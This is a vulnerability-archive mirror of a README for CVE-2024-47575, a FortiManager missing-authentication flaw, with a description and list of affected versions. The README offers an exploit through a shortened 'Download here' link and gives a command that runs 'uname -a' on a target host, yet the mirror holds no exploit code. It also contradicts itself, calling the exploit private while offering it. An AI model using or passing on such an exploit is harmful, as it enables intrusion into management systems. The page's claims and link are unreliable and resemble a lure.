关联漏洞
标题:Fortinet FortiManager 访问控制错误漏洞 (CVE-2024-47575)Description:Fortinet FortiManager是美国飞塔(Fortinet)公司的一套集中化网络安全管理平台。该平台支持集中管理任意数量的Fortinet设备,并能够将设备分组到不同的管理域(ADOM)进一步简化多设备安全部署与管理。 Fortinet FortiManager存在访问控制错误漏洞,该漏洞源于缺少关键功能的身份验证,允许攻击者通过特制的请求执行任意代码或命令。以下产品及版本受到影响:FortiManager 7.6.0版本;FortiManager 7.4.4版本及之前的7.4.x版本;For
介绍
# CVE-2024-47575: FortiManager Missing Authentication
## Overview
CVE-2024-47575
A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests.
## Exploit:
### [Download here](https://bit.ly/3US7qb1)
## Details
- **CVE ID**: [CVE-2024-47575](https://nvd.nist.gov/vuln/detail/CVE-2024-47575)
- **Published**: 2024-10-23
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8
## Vulnerability Description
CVE-2024-47575 is a critical vulnerability in the FortiManager platform, specifically affecting its fgfmsd daemon. Classified under CWE-306, it stems from insufficient authentication for management functions in the fgfmsd service, which handles communication between FortiManager and FortiGate devices.
This flaw allows a remote attacker to send crafted requests, bypass access controls, and execute arbitrary commands on the FortiManager system, potentially compromising the network.
## Affected Versions
**FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### [Download here](https://bit.ly/3US7qb1)



文件快照
[4.0K] /data/pocs/71d568fa1d5a4308f14ebf31ce931644d7e62031
├── [ 56K] fortinet-zero-day-fig2.max-600x600.png
├── [197K] fortinet-zero-day-fig5a.max-1100x1100.png
├── [ 57K] photo_2024-11-15_21-54-16.jpg
└── [1.9K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →